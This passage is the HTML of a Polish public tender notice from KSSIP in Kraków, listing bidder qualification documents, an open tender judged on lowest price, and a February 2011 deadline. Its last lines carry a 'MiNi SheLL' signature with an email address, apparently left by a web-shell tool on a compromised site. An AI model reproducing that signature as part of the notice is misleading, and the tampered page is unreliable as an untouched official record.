posiada środki finansowe w kwocie co najmniej 50.000 zł oraz ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej wystawione na kwotę nie mniejszą niż 50.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kssip.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> KSSIP w Krakowie ul. Przy Rondzie 5, 31-547 Kraków, pok 327.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2011 godzina 10:45, miejsce: KSSIP w Krakowie ul. Przy Rondzie 5, 31-547 Kraków, pok.419.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com